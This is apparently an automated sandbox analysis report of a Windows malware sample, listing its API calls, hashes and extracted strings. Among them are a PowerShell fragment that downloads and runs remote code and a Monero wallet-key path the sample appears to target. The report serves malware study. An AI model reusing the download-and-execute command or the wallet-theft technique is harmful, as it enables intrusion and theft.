                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandleSize
                                        • String ID: >=$>=
                                        • API String ID: 1378416451-3543398223
                                        • Opcode ID: bf0b656c9b5bbfbd7eeb04f7bb61d8264c52be36c4c606679ecec545ca2a6114
                                        • Instruction ID: fa2cac9e173a32a6220d350068ffffc4cefa9d8e1393c58aac9e3368aeaffc38
                                        • Opcode Fuzzy Hash: bf0b656c9b5bbfbd7eeb04f7bb61d8264c52be36c4c606679ecec545ca2a6114
                                        • Instruction Fuzzy Hash: 7FF0A438E00308BBDB20DFB5EC88F9E77BAAB48704F10D594FA51AB184D67596018B80
                                        APIs
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E1A13C
                                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E1A161
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00E1A181
                                        • ReadFile.KERNEL32(000000FF,?,00000000,00E1148F,00000000), ref: 00E1A1AA
                                        • LocalFree.KERNEL32(00E1148F), ref: 00E1A1E0
                                        • CloseHandle.KERNEL32(000000FF), ref: 00E1A1EA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                        • String ID:
                                        • API String ID: 2311089104-0
                                        • Opcode ID: 334d2e32598ca80df67824a649dddcaa399fc75e038bad6a28a46e6c7a15f3b6
                                        • Instruction ID: abbcbbacf178f820582ea4e548259568adf7185fe51347649e98cce4febb50a1
                                        • Opcode Fuzzy Hash: 334d2e32598ca80df67824a649dddcaa399fc75e038bad6a28a46e6c7a15f3b6
                                        • Instruction Fuzzy Hash: 85312EB4A01209EFDB14CFA4D845BEE77B5BF48704F148168F911BB284D774AA81CFA1
                                        APIs
                                        • lstrcat.KERNEL32(?,01A8EEA8), ref: 00E24A2B
                                          • Part of subcall function 00E28F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E28F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E24A51
                                        • lstrcat.KERNEL32(?,?), ref: 00E24A70
                                        • lstrcat.KERNEL32(?,?), ref: 00E24A84
                                        • lstrcat.KERNEL32(?,01A7A678), ref: 00E24A97
                                        • lstrcat.KERNEL32(?,?), ref: 00E24AAB
                                        • lstrcat.KERNEL32(?,01A8D918), ref: 00E24ABF
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E28F20: GetFileAttributesA.KERNEL32(00000000,?,00E11B94,?,?,00E3577C,?,?,00E30E22), ref: 00E28F2F
                                          • Part of subcall function 00E247C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00E247D0
                                          • Part of subcall function 00E247C0: RtlAllocateHeap.NTDLL(00000000), ref: 00E247D7
                                          • Part of subcall function 00E247C0: wsprintfA.USER32 ref: 00E247F6
                                          • Part of subcall function 00E247C0: FindFirstFileA.KERNEL32(?,?), ref: 00E2480D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                        • String ID:
                                        • API String ID: 2540262943-0
                                        • Opcode ID: a74ede6c86167300b7a874fd00e1b3a5bb0a01b81571ccdfcd743e0ea1d83bff
                                        • Instruction ID: 311503621352c526ee3598d427847a502b7addbfbc4f273770acfbc74fad664f
                                        • Opcode Fuzzy Hash: a74ede6c86167300b7a874fd00e1b3a5bb0a01b81571ccdfcd743e0ea1d83bff
                                        • Instruction Fuzzy Hash: 473195F690021867DB28F7B0ED85EDD73BCAB58700F40458DB245A6049DE75A7C8CF94
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00E22FD5
                                        Strings
                                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00E22F14
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00E22F54
                                        • ')", xrefs: 00E22F03
                                        • <, xrefs: 00E22F89
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        • API String ID: 3031569214-898575020
                                        • Opcode ID: 327271982e049667bdf8b58e40072cc6e1f3b215b168da25b41b492da87e5783
                                        • Instruction ID: f01a01f24ecf72e907f160ad07942e001790e526e52c95b0405abdcd8263efb2
                                        • Opcode Fuzzy Hash: 327271982e049667bdf8b58e40072cc6e1f3b215b168da25b41b492da87e5783
                                        • Instruction Fuzzy Hash: D9410F71D102189BDB14FFA0E862FDDBBB9AF10300F486469E00677192DF752A49CF51
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000001,01A8DA58,00000000,00020119,?), ref: 00E24344
                                        • RegQueryValueExA.ADVAPI32(?,01A8EFF8,00000000,00000000,00000000,000000FF), ref: 00E24368
                                        • RegCloseKey.ADVAPI32(?), ref: 00E24372
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E24397
                                        • lstrcat.KERNEL32(?,01A8EE48), ref: 00E243AB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 690832082-0
                                        • Opcode ID: 7f25e476a3196d8b4a1ed067fc48848c4c3aa01128c1fc71b2038c08efb45a59
                                        • Instruction ID: 784819ca7ffc47cb1e2e5069e392ea31f402f9509c987a44e8d254a05cc9e4de
                                        • Opcode Fuzzy Hash: 7f25e476a3196d8b4a1ed067fc48848c4c3aa01128c1fc71b2038c08efb45a59
                                        • Instruction Fuzzy Hash: 8841CBB69001086BDF24EBA0FC46FEE73BDAB98700F00459CB7565A1C5EE7656C88BD1
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: dllmain_raw$dllmain_crt_dispatch
                                        • String ID:
                                        • API String ID: 3136044242-0
                                        • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                        • Instruction ID: ad2182a34f43c74332ad05f86648f454d6b035243f3bfde2d38ba84708e71878
                                        • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                        • Instruction Fuzzy Hash: 52218172D40618ABDB22BE55CD419BFBAA9EB82798F266115F90D77211C3304D41CBB0
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E27FC7
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E27FCE
                                        • RegOpenKeyExA.ADVAPI32(80000002,01A7B590,00000000,00020119,?), ref: 00E27FEE
                                        • RegQueryValueExA.ADVAPI32(?,01A8D8F8,00000000,00000000,000000FF,000000FF), ref: 00E2800F
                                        • RegCloseKey.ADVAPI32(?), ref: 00E28022
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: 4b87b944fc9598c6ffd484bbe89ac0a036c015de15d2bb1b1e6d0c77d362aa7f
                                        • Instruction ID: a2f3018cad63a3d9601eb45e73dd2c04cac74aa64af9042945b4b0671826147f
                                        • Opcode Fuzzy Hash: 4b87b944fc9598c6ffd484bbe89ac0a036c015de15d2bb1b1e6d0c77d362aa7f
                                        • Instruction Fuzzy Hash: 40118FB1A44305EBE710CB85ED46FAFBBB8EB04B10F104219F611AB284DB7A58008BA1
                                        APIs
                                        • StrStrA.SHLWAPI(01A8EED8,00000000,00000000,?,00E19F71,00000000,01A8EED8,00000000), ref: 00E293FC
                                        • lstrcpyn.KERNEL32(010E7580,01A8EED8,01A8EED8,?,00E19F71,00000000,01A8EED8), ref: 00E29420
                                        • lstrlen.KERNEL32(00000000,?,00E19F71,00000000,01A8EED8), ref: 00E29437
                                        • wsprintfA.USER32 ref: 00E29457
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpynlstrlenwsprintf
                                        • String ID: %s%s
                                        • API String ID: 1206339513-3252725368
                                        • Opcode ID: 04adc2dec78ec723048a33ffde8ec7394b7ede64c70df9e6a23a3efe953d2df0
                                        • Instruction ID: c381dfe02e09a9f337634a3992feb0d3729950124f75f02d4479c25c305b6484
                                        • Opcode Fuzzy Hash: 04adc2dec78ec723048a33ffde8ec7394b7ede64c70df9e6a23a3efe953d2df0
                                        • Instruction Fuzzy Hash: 81015E76500208FFDB08DFA9D888EAE7BB8EB08704F108248F9499B205D671EA40DBD1
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E112B4
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E112BB
                                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00E112D7
                                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00E112F5
                                        • RegCloseKey.ADVAPI32(?), ref: 00E112FF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: bb825b5d2f215b7eb33c7f8fe1d083f5e0aca3b078f18c2557638e7cc7abf26e
                                        • Instruction ID: 49888f5dab3c687e99dccd889dc7f6dab2be2a1eaab64d9b882066599482cdea
                                        • Opcode Fuzzy Hash: bb825b5d2f215b7eb33c7f8fe1d083f5e0aca3b078f18c2557638e7cc7abf26e
                                        • Instruction Fuzzy Hash: 3E013179A40309BFDB10DFD5DC49FAEB7B8EB48B00F004198FA459B284D7759A00CB90
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String___crt$Type
                                        • String ID:
                                        • API String ID: 2109742289-3916222277
                                        • Opcode ID: 5e1d8b3a628e78bc3cee1eb59820b0238238ac2cd481b1de884bb5299b334a5a
                                        • Instruction ID: 01fdff47a3be1b2fe4658ddea2c0ca3ac9710a9e683dae50155083e56229e45c
                                        • Opcode Fuzzy Hash: 5e1d8b3a628e78bc3cee1eb59820b0238238ac2cd481b1de884bb5299b334a5a
                                        • Instruction Fuzzy Hash: A241E7B01047AC5FDB218B24DC85FFFBBE8AB45708F2454E8E98AA6142D2719A44DF60
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00E26903
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00E269C6
                                        • ExitProcess.KERNEL32 ref: 00E269F5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
